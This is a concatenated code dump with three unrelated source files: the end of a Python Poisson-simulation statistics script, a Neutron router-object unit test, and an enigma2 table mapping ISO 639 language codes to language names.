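# Poisson(lam), so the sample mean and sample variance should both be ~lam.
def PoissonCheck(lam=2, m=10000):
    """Empirically checks that SimulateGame yields Poisson-distributed counts.
    lam: goal-scoring rate in goals per game
    m: number of simulated games
    """
    samples = [SimulateGame(lam) for _ in range(m)]
    print('PoissonCheck: mean', np.mean(samples), 'var', np.var(samples))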
def Estimate4(lam=2, m=1000000):
estimates = []
for i in range(m):
L = SimulateGame(lam)
estimates.append(L)
print('Experiment 4')
print('rmse L', RMSE(estimates, lam))
print('mean error L', MeanError(estimates, lam))
pmf = thinkstats2.Pmf(estimates)
thinkplot.Hist(pmf)
thinkplot.Show()
def main():
thinkstats2.RandomSeed(17)
Estimate1()
Estimate2()
print('Experiment 3')
for n in [10, 100, 1000]:
stderr = SimulateSample(n=n)
print(n, stderr)
Estimate4()
if __name__ == '__main__':
main()
| gpl-3.0 |
cloudbase/neutron | neutron/tests/unit/objects/test_router.py | 1 | 2160 | # Copyright (c) 2016 Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.objects import router
from neutron.tests.unit.objects import test_base as obj_test_base
from neutron.tests.unit import testlib_api
class RouterRouteIfaceObjectTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = router.RouterRoute
class RouterRouteDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = router.RouterRoute
def setUp(self):
super(RouterRouteDbObjectTestCase, self).setUp()
for db_obj, obj_field, obj in zip(
self.db_objs, self.obj_fields, self.objs):
self._create_test_router()
db_obj['router_id'] = self._router['id']
obj_field['router_id'] = self._router['id']
obj['router_id'] = self._router['id']
class RouterExtraAttrsIfaceObjTestCase(obj_test_base.
BaseObjectIfaceTestCase):
_test_class = router.RouterExtraAttributes
class RouterExtraAttrsDbObjTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = router.RouterExtraAttributes
def setUp(self):
super(RouterExtraAttrsDbObjTestCase, self).setUp()
for db_obj, obj_field, obj in zip(
self.db_objs, self.obj_fields, self.objs):
self._create_test_router()
db_obj['router_id'] = self._router['id']
obj_field['router_id'] = self._router['id']
obj['router_id'] = self._router['id']
| apache-2.0 |
BlackPole/bp-enigma2 | lib/python/Tools/ISO639.py | 79 | 23367 | # -*- coding: iso-8859-2 -*-
LanguageCodes = { }
LanguageCodes["aar"] = LanguageCodes["aa"] = ("Afar", "Hamitic")
LanguageCodes["abk"] = LanguageCodes["ab"] = ("Abkhazian", "Ibero-caucasian")
LanguageCodes["ace"] = ("Achinese", "")
LanguageCodes["ach"] = ("Acoli", "")
LanguageCodes["ada"] = ("Adangme", "")
LanguageCodes["afa"] = ("Afro-Asiatic (Other)", "")
LanguageCodes["afh"] = ("Afrihili", "")
LanguageCodes["afr"] = LanguageCodes["af"] = ("Afrikaans", "Germanic")
LanguageCodes["aka"] = ("Akan", "")
LanguageCodes["akk"] = ("Akkadian", "")
LanguageCodes["ale"] = ("Aleut", "")
LanguageCodes["alg"] = ("Algonquian languages", "")
LanguageCodes["amh"] = LanguageCodes["am"] = ("Amharic", "Semitic")
LanguageCodes["ang"] = ("English, Old (ca. 450-1100)", "")
LanguageCodes["apa"] = ("Apache languages", "")
LanguageCodes["ara"] = LanguageCodes["ar"] = ("Arabic", "Semitic")
LanguageCodes["arc"] = ("Aramaic", "")
LanguageCodes["arn"] = ("Araucanian", "")
LanguageCodes["arp"] = ("Arapaho", "")
LanguageCodes["art"] = ("Artificial (Other)", "")
LanguageCodes["arw"] = ("Arawak", "")
LanguageCodes["asm"] = LanguageCodes["as"] = ("Assamese", "Indian")
LanguageCodes["ath"] = ("Athapascan languages", "")
LanguageCodes["aus"] = ("Australian languages", "")
LanguageCodes["ava"] = ("Avaric", "")
LanguageCodes["ave"] = LanguageCodes["ae"] = ("Avestan", "")
LanguageCodes["awa"] = ("Awadhi", "")
LanguageCodes["aym"] = LanguageCodes["ay"] = ("Aymara", "Amerindian")
LanguageCodes["aze"] = LanguageCodes["az"] = ("Azerbaijani", "Turkic/altaic")
LanguageCodes["bad"] = ("Banda", "")
LanguageCodes["bai"] = ("Bamileke languages", "")
LanguageCodes["bak"] = LanguageCodes["ba"] = ("Bashkir", "Turkic/altaic")
LanguageCodes["bal"] = ("Baluchi", "")
LanguageCodes["bam"] = ("Bambara", "")
LanguageCodes["ban"] = ("Balinese", "")
LanguageCodes["bas"] = ("Basa", "")
LanguageCodes["bat"] = ("Baltic (Other)", "")
LanguageCodes["bej"] = ("Beja", "")
LanguageCodes["bel"] = LanguageCodes["be"] = ("Belarusian", "Slavic")
LanguageCodes["bem"] = ("Bemba", "")
LanguageCodes["ben"] = LanguageCodes["bn"] = ("Bengali", "Indian")
LanguageCodes["ber"] = ("Berber (Other)", "")
LanguageCodes["bho"] = ("Bhojpuri", "")
LanguageCodes["bih"] = LanguageCodes["bh"] = ("Bihari", "Indian")
LanguageCodes["bik"] = ("Bikol", "")
LanguageCodes["bin"] = ("Bini", "")
LanguageCodes["bis"] = LanguageCodes["bi"] = ("Bislama", "")
LanguageCodes["bla"] = ("Siksika", "")
LanguageCodes["bnt"] = ("Bantu (Other)", "")
LanguageCodes["bod"] = LanguageCodes["tib"] = LanguageCodes["bo"] = ("Tibetan", "Asian")
LanguageCodes["bos"] = LanguageCodes["bs"] = ("Bosnian", "")
LanguageCodes["bra"] = ("Braj", "")
LanguageCodes["bre"] = LanguageCodes["br"] = ("Breton", "Celtic")
LanguageCodes["btk"] = ("Batak (Indonesia)", "")
LanguageCodes["bua"] = ("Buriat", "")
LanguageCodes["bug"] = ("Buginese", "")
LanguageCodes["bul"] = LanguageCodes["bg"] = ("Bulgarian", "Slavic")
LanguageCodes["cad"] = ("Caddo", "")
LanguageCodes["cai"] = ("Central American Indian (Other)", "")
LanguageCodes["car"] = ("Carib", "")
LanguageCodes["cat"] = LanguageCodes["ca"] = ("Catalan", "Romance")
LanguageCodes["cau"] = ("Caucasian (Other)", "")
LanguageCodes["ceb"] = ("Cebuano", "")
LanguageCodes["cel"] = ("Celtic (Other)", "")
LanguageCodes["ces"] = LanguageCodes["cze"] = LanguageCodes["cs"] = ("Czech", "Slavic")
LanguageCodes["cha"] = LanguageCodes["ch"] = ("Chamorro", "")
LanguageCodes["chb"] = ("Chibcha", "")
LanguageCodes["che"] = LanguageCodes["ce"] = ("Chechen", "")
LanguageCodes["chg"] = ("Chagatai", "")
LanguageCodes["chk"] = ("Chuukese", "")
LanguageCodes["chm"] = ("Mari", "")
LanguageCodes["chn"] = ("Chinook jargon", "")
LanguageCodes["cho"] = ("Choctaw", "")
LanguageCodes["chp"] = ("Chipewyan", "")
LanguageCodes["chr"] = ("Cherokee", "")
LanguageCodes["chu"] = LanguageCodes["cu"] = ("Church Slavic", "")
LanguageCodes["chv"] = LanguageCodes["cv"] = ("Chuvash", "")
LanguageCodes["chy"] = ("Cheyenne", "")
LanguageCodes["cmc"] = ("Chamic languages", "")
LanguageCodes["cop"] = ("Coptic", "")
LanguageCodes["cor"] = LanguageCodes["kw"] = ("Cornish", "")
LanguageCodes["cos"] = LanguageCodes["co"] = ("Corsican", "Romance")
LanguageCodes["cpe"] = ("Creoles and pidgins, English based (Other)", "")
LanguageCodes["cpf"] = ("Creoles and pidgins, French-based (Other)", "")
LanguageCodes["cpp"] = ("Creoles and pidgins, Portuguese-based (Other)", "")
LanguageCodes["cre"] = ("Cree", "")
LanguageCodes["crp"] = ("Creoles and pidgins (Other)", "")
LanguageCodes["cus"] = ("Cushitic (Other)", "")
LanguageCodes["cym"] = LanguageCodes["wel"] = LanguageCodes["cy"] = ("Welsh", "Celtic")
LanguageCodes["dak"] = ("Dakota", "")
LanguageCodes["dan"] = LanguageCodes["da"] = ("Danish", "Germanic")
LanguageCodes["day"] = ("Dayak", "")
LanguageCodes["del"] = ("Delaware", "")
LanguageCodes["den"] = ("Slave (Athapascan)", "")
LanguageCodes["deu"] = LanguageCodes["ger"] = LanguageCodes["de"] = ("German", "Germanic")
LanguageCodes["dgr"] = ("Dogrib", "")
LanguageCodes["din"] = ("Dinka", "")
LanguageCodes["div"] = ("Divehi", "")
LanguageCodes["doi"] = ("Dogri", "")
LanguageCodes["dra"] = ("Dravidian (Other)", "")
LanguageCodes["dua"] = ("Duala", "")
LanguageCodes["dum"] = ("Dutch, Middle (ca. 1050-1350)", "")
LanguageCodes["dyu"] = ("Dyula", "")
LanguageCodes["dzo"] = LanguageCodes["dz"] = ("Dzongkha", "Asian")
LanguageCodes["efi"] = ("Efik", "")
LanguageCodes["egy"] = ("Egyptian (Ancient)", "")
LanguageCodes["eka"] = ("Ekajuk", "")
LanguageCodes["ell"] = LanguageCodes["gre"] = LanguageCodes["el"] = ("Greek, Modern (1453-)", "Latin/greek")
LanguageCodes["elx"] = ("Elamite", "")
LanguageCodes["eng"] = LanguageCodes["en"] = ("English", "Germanic")
LanguageCodes["enm"] = ("English, Middle (1100-1500)", "")
LanguageCodes["epo"] = LanguageCodes["eo"] = ("Esperanto", "International aux.")
LanguageCodes["est"] = LanguageCodes["et"] = ("Estonian", "Finno-ugric")
LanguageCodes["eus"] = LanguageCodes["baq"] = LanguageCodes["eu"] = ("Basque", "Basque")
LanguageCodes["ewe"] = ("Ewe", "")
LanguageCodes["ewo"] = ("Ewondo", "")
LanguageCodes["fan"] = ("Fang", "")
LanguageCodes["fao"] = LanguageCodes["fo"] = ("Faroese", "Germanic")
LanguageCodes["fas"] = LanguageCodes["per"] = LanguageCodes["fa"] = ("Persian", "")
LanguageCodes["fat"] = ("Fanti", "")
LanguageCodes["fij"] = LanguageCodes["fj"] = ("Fijian", "Oceanic/indonesian")
LanguageCodes["fin"] = LanguageCodes["fi"] = ("Finnish", "Finno-ugric")
LanguageCodes["fiu"] = ("Finno-Ugrian (Other)", "")
LanguageCodes["fon"] = ("Fon", "")
LanguageCodes["fra"] = LanguageCodes["fre"] = LanguageCodes["fr"] = ("French", "Romance")
LanguageCodes["frm"] = ("French, Middle (ca. 1400-1600)", "")
LanguageCodes["fro"] = ("French, Old (842-ca. 1400)", "")
LanguageCodes["fry"] = LanguageCodes["fy"] = ("Frisian", "Germanic")
LanguageCodes["ful"] = ("Fulah", "")
LanguageCodes["fur"] = ("Friulian", "")
LanguageCodes["gaa"] = ("Ga", "")
LanguageCodes["gay"] = ("Gayo", "")
LanguageCodes["gba"] = ("Gbaya", "")
LanguageCodes["gem"] = ("Germanic (Other)", "")
LanguageCodes["gez"] = ("Geez", "")
LanguageCodes["gil"] = ("Gilbertese", "")
LanguageCodes["gla"] = LanguageCodes["gd"] = ("Gaelic (Scots)", "Celtic")
LanguageCodes["gle"] = LanguageCodes["ga"] = ("Irish", "Celtic")
LanguageCodes["glg"] = LanguageCodes["gl"] = ("Gallegan", "Romance")
LanguageCodes["glv"] = LanguageCodes["gv"] = ("Manx", "")
LanguageCodes["gmh"] = ("German, Middle High (ca. 1050-1500)", "")
LanguageCodes["goh"] = ("German, Old High (ca. 750-1050)", "")
LanguageCodes["gon"] = ("Gondi", "")
LanguageCodes["gor"] = ("Gorontalo", "")
LanguageCodes["got"] = ("Gothic", "")
LanguageCodes["grb"] = ("Grebo", "")
LanguageCodes["grc"] = ("Greek, Ancient (to 1453)", "")
LanguageCodes["grn"] = LanguageCodes["gn"] = ("Guarani", "Amerindian")
LanguageCodes["guj"] = LanguageCodes["gu"] = ("Gujarati", "Indian")
LanguageCodes["gwi"] = ("Gwich´in", "")
LanguageCodes["hai"] = ("Haida", "")
LanguageCodes["hau"] = LanguageCodes["ha"] = ("Hausa", "Negro-african")
LanguageCodes["haw"] = ("Hawaiian", "")
LanguageCodes["heb"] = LanguageCodes["he"] = ("Hebrew", "")
LanguageCodes["her"] = LanguageCodes["hz"] = ("Herero", "")
LanguageCodes["hil"] = ("Hiligaynon", "")
LanguageCodes["him"] = ("Himachali", "")
LanguageCodes["hin"] = LanguageCodes["hi"] = ("Hindi", "Indian")
LanguageCodes["hit"] = ("Hittite", "")
LanguageCodes["hmn"] = ("Hmong", "")
LanguageCodes["hmo"] = LanguageCodes["ho"] = ("Hiri Motu", "")
LanguageCodes["hrv"] = LanguageCodes["scr"] = LanguageCodes["hr"] = ("Croatian", "Slavic")
LanguageCodes["hun"] = LanguageCodes["hu"] = ("Hungarian", "Finno-ugric")
LanguageCodes["hup"] = ("Hupa", "")
LanguageCodes["hye"] = LanguageCodes["arm"] = LanguageCodes["hy"] = ("Armenian", "Indo-european (other)")
LanguageCodes["iba"] = ("Iban", "")
LanguageCodes["ibo"] = ("Igbo", "")
LanguageCodes["ijo"] = ("Ijo", "")
LanguageCodes["iku"] = LanguageCodes["iu"] = ("Inuktitut", "")
LanguageCodes["ile"] = LanguageCodes["ie"] = ("Interlingue", "International aux.")
LanguageCodes["ilo"] = ("Iloko", "")
LanguageCodes["ina"] = LanguageCodes["ia"] = ("Interlingua (International Auxiliary Language Association)", "International aux.")
LanguageCodes["inc"] = ("Indic (Other)", "")
LanguageCodes["ind"] = LanguageCodes["id"] = ("Indonesian", "")
LanguageCodes["ine"] = ("Indo-European (Other)", "")
LanguageCodes["ipk"] = LanguageCodes["ik"] = ("Inupiaq", "Eskimo")
LanguageCodes["ira"] = ("Iranian (Other)", "")
LanguageCodes["iro"] = ("Iroquoian languages", "")
LanguageCodes["isl"] = LanguageCodes["ice"] = LanguageCodes["is"] = ("Icelandic", "Germanic")
LanguageCodes["ita"] = LanguageCodes["it"] = ("Italian", "Romance")
LanguageCodes["jaw"] = LanguageCodes["jav"] = LanguageCodes["jw"] = ("Javanese", "")
LanguageCodes["jpn"] = LanguageCodes["ja"] = ("Japanese", "Asian")
LanguageCodes["jpr"] = ("Judeo-Persian", "")
LanguageCodes["kaa"] = ("Kara-Kalpak", "")
LanguageCodes["kab"] = ("Kabyle", "")
LanguageCodes["kac"] = ("Kachin", "")
LanguageCodes["kal"] = LanguageCodes["kl"] = ("Kalaallisut", "Eskimo")
LanguageCodes["kam"] = ("Kamba", "")
LanguageCodes["kan"] = LanguageCodes["kn"] = ("Kannada", "Dravidian")
LanguageCodes["kar"] = ("Karen", "")
LanguageCodes["kas"] = LanguageCodes["ks"] = ("Kashmiri", "Indian")
LanguageCodes["kat"] = LanguageCodes["geo"] = LanguageCodes["ka"] = ("Georgian", "Ibero-caucasian")
LanguageCodes["kau"] = ("Kanuri", "")
LanguageCodes["kaw"] = ("Kawi", "")
LanguageCodes["kaz"] = LanguageCodes["kk"] = ("Kazakh", "Turkic/altaic")
LanguageCodes["kha"] = ("Khasi", "")
LanguageCodes["khi"] = ("Khoisan (Other)", "")
LanguageCodes["khm"] = LanguageCodes["km"] = ("Khmer", "Asian")
LanguageCodes["kho"] = ("Khotanese", "")
LanguageCodes["kik"] = LanguageCodes["ki"] = ("Kikuyu", "")
LanguageCodes["kin"] = LanguageCodes["rw"] = ("Kinyarwanda", "Negro-african")
LanguageCodes["kir"] = LanguageCodes["ky"] = ("Kirghiz", "Turkic/altaic")
LanguageCodes["kmb"] = ("Kimbundu", "")
LanguageCodes["kok"] = ("Konkani", "")
LanguageCodes["kom"] = LanguageCodes["kv"] = ("Komi", "")
LanguageCodes["kon"] = ("Kongo", "")
LanguageCodes["kor"] = LanguageCodes["ko"] = ("Korean", "Asian")
LanguageCodes["kos"] = ("Kosraean", "")
LanguageCodes["kpe"] = ("Kpelle", "")
LanguageCodes["kro"] = ("Kru", "")
LanguageCodes["kru"] = ("Kurukh", "")
LanguageCodes["kum"] = ("Kumyk", "")
LanguageCodes["kur"] = LanguageCodes["ku"] = ("Kurdish", "Iranian")
LanguageCodes["kut"] = ("Kutenai", "")
LanguageCodes["lad"] = ("Ladino", "")
LanguageCodes["lah"] = ("Lahnda", "")
LanguageCodes["lam"] = ("Lamba", "")
LanguageCodes["lao"] = LanguageCodes["lo"] = ("Lao", "Asian")
LanguageCodes["lat"] = LanguageCodes["la"] = ("Latin", "Latin/greek")
LanguageCodes["lav"] = LanguageCodes["lv"] = ("Latvian", "Baltic")
LanguageCodes["lez"] = ("Lezghian", "")
LanguageCodes["lin"] = LanguageCodes["ln"] = ("Lingala", "Negro-african")
LanguageCodes["lit"] = LanguageCodes["lt"] = ("Lithuanian", "Baltic")
LanguageCodes["lol"] = ("Mongo", "")
LanguageCodes["loz"] = ("Lozi", "")
LanguageCodes["ltz"] = LanguageCodes["lb"] = ("Letzeburgesch", "")
LanguageCodes["lua"] = ("Luba-Lulua", "")
LanguageCodes["lub"] = ("Luba-Katanga", "")
LanguageCodes["lug"] = ("Ganda", "")
LanguageCodes["lui"] = ("Luiseno", "")
LanguageCodes["lun"] = ("Lunda", "")
LanguageCodes["luo"] = ("Luo (Kenya and Tanzania)", "")
LanguageCodes["lus"] = ("lushai", "")
LanguageCodes["mad"] = ("Madurese", "")
LanguageCodes["mag"] = ("Magahi", "")
LanguageCodes["mah"] = LanguageCodes["mh"] = ("Marshall", "")
LanguageCodes["mai"] = ("Maithili", "")
LanguageCodes["mak"] = ("Makasar", "")
LanguageCodes["mal"] = LanguageCodes["ml"] = ("Malayalam", "Dravidian")
LanguageCodes["man"] = ("Mandingo", "")
LanguageCodes["map"] = ("Austronesian (Other)", "")
LanguageCodes["mar"] = LanguageCodes["mr"] = ("Marathi", "Indian")
LanguageCodes["mas"] = ("Masai", "")
LanguageCodes["mdr"] = ("Mandar", "")
LanguageCodes["men"] = ("Mende", "")
LanguageCodes["mga"] = ("Irish, Middle (900-1200)", "")
LanguageCodes["mic"] = ("Micmac", "")
LanguageCodes["min"] = ("Minangkabau", "")
LanguageCodes["mis"] = ("Miscellaneous languages", "")
LanguageCodes["mkd"] = LanguageCodes["mac"] = LanguageCodes["mk"] = ("Macedonian", "Slavic")
LanguageCodes["mkh"] = ("Mon-Khmer (Other)", "")
LanguageCodes["mlg"] = LanguageCodes["mg"] = ("Malagasy", "Oceanic/indonesian")
LanguageCodes["mlt"] = LanguageCodes["mt"] = ("Maltese", "Semitic")
LanguageCodes["mnc"] = ("Manchu", "")
LanguageCodes["mni"] = ("Manipuri", "")
LanguageCodes["mno"] = ("Manobo languages", "")
LanguageCodes["moh"] = ("Mohawk", "")
LanguageCodes["mol"] = LanguageCodes["mo"] = ("Moldavian", "Romance")
LanguageCodes["mon"] = LanguageCodes["mn"] = ("Mongolian", "")
LanguageCodes["mos"] = ("Mossi", "")
LanguageCodes["mri"] = LanguageCodes["mao"] = LanguageCodes["mi"] = ("Maori", "Oceanic/indonesian")
LanguageCodes["msa"] = LanguageCodes["may"] = LanguageCodes["ms"] = ("Malay", "Oceanic/indonesian")
LanguageCodes["mul"] = ("Multiple languages", "")
LanguageCodes["mun"] = ("Munda languages", "")
LanguageCodes["mus"] = ("Creek", "")
LanguageCodes["mwr"] = ("Marwari", "")
LanguageCodes["mya"] = LanguageCodes["bur"] = LanguageCodes["my"] = ("Burmese", "Asian")
LanguageCodes["myn"] = ("Mayan languages", "")
LanguageCodes["nah"] = ("Nahuatl", "")
LanguageCodes["nai"] = ("North American Indian", "")
LanguageCodes["nau"] = LanguageCodes["na"] = ("Nauru", "")
LanguageCodes["nav"] = LanguageCodes["nv"] = ("Navajo", "")
LanguageCodes["nbl"] = LanguageCodes["nr"] = ("Ndebele, South", "")
LanguageCodes["nde"] = LanguageCodes["nd"] = ("Ndebele, North", "")
LanguageCodes["ndo"] = LanguageCodes["ng"] = ("Ndonga", "")
LanguageCodes["nds"] = ("Low German; Low Saxon; German, Low; Saxon, Low", "")
LanguageCodes["nep"] = LanguageCodes["ne"] = ("Nepali", "Indian")
LanguageCodes["new"] = ("Newari", "")
LanguageCodes["nia"] = ("Nias", "")
LanguageCodes["nic"] = ("Niger-Kordofanian (Other)", "")
LanguageCodes["niu"] = ("Niuean", "")
LanguageCodes["nld"] = LanguageCodes["dut"] = LanguageCodes["nl"] = ("Dutch", "Germanic")
LanguageCodes["nno"] = LanguageCodes["nn"] = ("Norwegian Nynorsk", "")
LanguageCodes["nob"] = LanguageCodes["nb"] = ("Norwegian Bokmål", "")
LanguageCodes["non"] = ("Norse, Old", "")
LanguageCodes["nor"] = LanguageCodes["no"] = ("Norwegian", "Germanic")
LanguageCodes["nso"] = ("Sotho, Northern", "")
LanguageCodes["nub"] = ("Nubian languages", "")
LanguageCodes["nya"] = LanguageCodes["ny"] = ("Chichewa; Nyanja", "")
LanguageCodes["nym"] = ("Nyamwezi", "")
LanguageCodes["nyn"] = ("Nyankole", "")
LanguageCodes["nyo"] = ("Nyoro", "")
LanguageCodes["nzi"] = ("Nzima", "")
LanguageCodes["oci"] = LanguageCodes["oc"] = ("Occitan (post 1500); Provençal", "Romance")
LanguageCodes["oji"] = ("Ojibwa", "")
LanguageCodes["ori"] = LanguageCodes["or"] = ("Oriya", "Indian")
LanguageCodes["orm"] = LanguageCodes["om"] = ("Oromo", "Hamitic")
LanguageCodes["osa"] = ("Osage", "")
LanguageCodes["oss"] = LanguageCodes["os"] = ("Ossetian; Ossetic", "")
LanguageCodes["ota"] = ("Turkish, Ottoman (1500-1928)", "")
LanguageCodes["oto"] = ("Otomian languages", "")
LanguageCodes["paa"] = ("Papuan (Other)", "")
LanguageCodes["pag"] = ("Pangasinan", "")
LanguageCodes["pal"] = ("Pahlavi", "")
LanguageCodes["pam"] = ("Pampanga", "")
LanguageCodes["pan"] = LanguageCodes["pa"] = ("Panjabi", "Indian")
LanguageCodes["pap"] = ("Papiamento", "")
LanguageCodes["pau"] = ("Palauan", "")
LanguageCodes["peo"] = ("Persian, Old (ca. 600-400 b.c.)", "")
LanguageCodes["phi"] = ("Philippine (Other)", "")
LanguageCodes["pli"] = LanguageCodes["pi"] = ("Pali", "")
LanguageCodes["pol"] = LanguageCodes["pl"] = ("Polish", "Slavic")
LanguageCodes["pon"] = ("Pohnpeian", "")
LanguageCodes["por"] = LanguageCodes["pt"] = ("Portuguese", "Romance")
LanguageCodes["pra"] = ("Prakrit languages", "")
LanguageCodes["pro"] = ("Provençal, Old (to 1500)", "")
LanguageCodes["pus"] = LanguageCodes["ps"] = ("Pushto", "Iranian")
LanguageCodes["que"] = LanguageCodes["qu"] = ("Quechua", "Amerindian")
LanguageCodes["raj"] = ("Rajasthani", "")
LanguageCodes["rap"] = ("Rapanui", "")
LanguageCodes["rar"] = ("Rarotongan", "")
LanguageCodes["roa"] = ("Romance (Other)", "")
LanguageCodes["rom"] = ("Romany", "")
LanguageCodes["ron"] = LanguageCodes["rum"] = LanguageCodes["ro"] = ("Romanian", "Romance")
LanguageCodes["run"] = LanguageCodes["rn"] = ("Rundi", "Negro-african")
LanguageCodes["rus"] = LanguageCodes["ru"] = ("Russian", "Slavic")
LanguageCodes["sad"] = ("Sandawe", "")
LanguageCodes["sag"] = LanguageCodes["sg"] = ("Sango", "Negro-african")
LanguageCodes["sah"] = ("Yakut", "")
LanguageCodes["sai"] = ("South American Indian (Other)", "")
LanguageCodes["sal"] = ("Salishan languages", "")
LanguageCodes["sam"] = ("Samaritan Aramaic", "")
LanguageCodes["san"] = LanguageCodes["sa"] = ("Sanskrit", "Indian")
LanguageCodes["sas"] = ("Sasak", "")
LanguageCodes["sat"] = ("Santali", "")
LanguageCodes["sco"] = ("Scots", "")
LanguageCodes["sel"] = ("Selkup", "")
LanguageCodes["sem"] = ("Semitic (Other)", "")
LanguageCodes["sga"] = ("Irish, Old (to 900)", "")
LanguageCodes["sgn"] = ("Sign Languages", "")
LanguageCodes["shn"] = ("Shan", "")
LanguageCodes["sid"] = ("Sidamo", "")
LanguageCodes["sin"] = LanguageCodes["si"] = ("Sinhalese", "Indian")
LanguageCodes["sio"] = ("Siouan languages", "")
LanguageCodes["sit"] = ("Sino-Tibetan (Other)", "")
LanguageCodes["sla"] = ("Slavic (Other)", "")
LanguageCodes["slk"] = LanguageCodes["slo"] = LanguageCodes["sk"] = ("Slovak", "Slavic")
LanguageCodes["slv"] = LanguageCodes["sl"] = ("Slovenian", "Slavic")
LanguageCodes["sme"] = LanguageCodes["se"] = ("Northern Sami", "")
LanguageCodes["smi"] = ("Sami languages (Other)", "")
LanguageCodes["smo"] = LanguageCodes["sm"] = ("Samoan", "Oceanic/indonesian")
LanguageCodes["sna"] = LanguageCodes["sn"] = ("Shona", "Negro-african")
LanguageCodes["snd"] = LanguageCodes["sd"] = ("Sindhi", "Indian")
LanguageCodes["snk"] = ("Soninke", "")
LanguageCodes["sog"] = ("Sogdian", "")
LanguageCodes["som"] = LanguageCodes["so"] = ("Somali", "Hamitic")
LanguageCodes["son"] = ("Songhai", "")
LanguageCodes["sot"] = LanguageCodes["st"] = ("Sotho, Southern", "Negro-african")
LanguageCodes["esl"] = LanguageCodes["spa"] = LanguageCodes["es"] = ("Spanish", "Romance")
LanguageCodes["sqi"] = LanguageCodes["alb"] = LanguageCodes["sq"] = ("Albanian", "Indo-european (other)")
LanguageCodes["srd"] = LanguageCodes["sc"] = ("Sardinian", "")
LanguageCodes["srp"] = LanguageCodes["scc"] = LanguageCodes["sr"] = ("Serbian", "Slavic")
LanguageCodes["srr"] = ("Serer", "")
LanguageCodes["ssa"] = ("Nilo-Saharan (Other)", "")
LanguageCodes["ssw"] = LanguageCodes["ss"] = ("Swati", "Negro-african")
LanguageCodes["suk"] = ("Sukuma", "")
LanguageCodes["sun"] = LanguageCodes["su"] = ("Sundanese", "Oceanic/indonesian")
LanguageCodes["sus"] = ("Susu", "")
LanguageCodes["sux"] = ("Sumerian", "")
LanguageCodes["swa"] = LanguageCodes["sw"] = ("Swahili", "Negro-african")
LanguageCodes["swe"] = LanguageCodes["sv"] = ("Swedish", "Germanic")
LanguageCodes["syr"] = ("Syriac", "")
LanguageCodes["tah"] = LanguageCodes["ty"] = ("Tahitian", "")
LanguageCodes["tai"] = ("Tai (Other)", "")
LanguageCodes["tam"] = LanguageCodes["ta"] = ("Tamil", "Dravidian")
LanguageCodes["tat"] = LanguageCodes["tt"] = ("Tatar", "Turkic/altaic")
LanguageCodes["tel"] = LanguageCodes["te"] = ("Telugu", "Dravidian")
LanguageCodes["tem"] = ("Timne", "")
LanguageCodes["ter"] = ("Tereno", "")
LanguageCodes["tet"] = ("Tetum", "")
LanguageCodes["tgk"] = LanguageCodes["tg"] = ("Tajik", "Iranian")
LanguageCodes["tgl"] = LanguageCodes["tl"] = ("Tagalog", "Oceanic/indonesian")
LanguageCodes["tha"] = LanguageCodes["th"] = ("Thai", "Asian")
LanguageCodes["tig"] = ("Tigre", "")
LanguageCodes["tir"] = LanguageCodes["ti"] = ("Tigrinya", "Semitic")
LanguageCodes["tiv"] = ("Tiv", "")
LanguageCodes["tkl"] = ("Tokelau", "")
LanguageCodes["tli"] = ("Tlingit", "")
LanguageCodes["tmh"] = ("Tamashek", "")
LanguageCodes["tog"] = ("Tonga (Nyasa)", "")
LanguageCodes["ton"] = LanguageCodes["to"] = ("Tonga (Tonga Islands)", "Oceanic/indonesian")
LanguageCodes["tpi"] = ("Tok Pisin", "")
LanguageCodes["tsi"] = ("Tsimshian", "")
LanguageCodes["tsn"] = LanguageCodes["tn"] = ("Tswana", "Negro-african")
LanguageCodes["tso"] = LanguageCodes["ts"] = ("Tsonga", "Negro-african")
LanguageCodes["tuk"] = LanguageCodes["tk"] = ("Turkmen", "Turkic/altaic")
LanguageCodes["tum"] = ("Tumbuka", "")
LanguageCodes["tur"] = LanguageCodes["tr"] = ("Turkish", "Turkic/altaic")
LanguageCodes["tut"] = ("Altaic (Other)", "")
LanguageCodes["tvl"] = ("Tuvalu", "")
LanguageCodes["twi"] = LanguageCodes["tw"] = ("Twi", "Negro-african")
LanguageCodes["tyv"] = ("Tuvinian", "")
LanguageCodes["uga"] = ("Ugaritic", "")
LanguageCodes["uig"] = LanguageCodes["ug"] = ("Uighur", "")
LanguageCodes["ukr"] = LanguageCodes["uk"] = ("Ukrainian", "Slavic")
LanguageCodes["umb"] = ("Umbundu", "")
LanguageCodes["und"] = ("Undetermined", "")
LanguageCodes["urd"] = LanguageCodes["ur"] = ("Urdu", "Indian")
LanguageCodes["uzb"] = LanguageCodes["uz"] = ("Uzbek", "Turkic/altaic")
LanguageCodes["vai"] = ("Vai", "")
LanguageCodes["ven"] = ("Venda", "")
LanguageCodes["vie"] = LanguageCodes["vi"] = ("Vietnamese", "Asian")
LanguageCodes["vol"] = LanguageCodes["vo"] = ("Volapük", "International aux.")
LanguageCodes["vot"] = ("Votic", "")
LanguageCodes["wak"] = ("Wakashan languages", "")
LanguageCodes["wal"] = ("Walamo", "")
LanguageCodes["war"] = ("Waray", "")
LanguageCodes["was"] = ("Washo", "")
LanguageCodes["wen"] = ("Sorbian languages", "")
LanguageCodes["wol"] = LanguageCodes["wo"] = ("Wolof", "Negro-african")
LanguageCodes["xho"] = LanguageCodes["xh"] = ("Xhosa", "Negro-african")
LanguageCodes["yao"] = ("Yao", "")
LanguageCodes["yap"] = ("Yapese", "")
LanguageCodes["yid"] = LanguageCodes["yi"] = ("Yiddish", "")
LanguageCodes["yor"] = LanguageCodes["yo"] = ("Yoruba", "Negro-african")
LanguageCodes["ypk"] = ("Yupik languages", "")
LanguageCodes["zap"] = ("Zapotec", "")
LanguageCodes["zen"] = ("Zenaga", "")
LanguageCodes["zha"] = LanguageCodes["za"] = ("Zhuang", "")
LanguageCodes["zho"] = LanguageCodes["chi"] = LanguageCodes["zh"] = ("Chinese", "Asian")
LanguageCodes["znd"] = ("Zande", "")
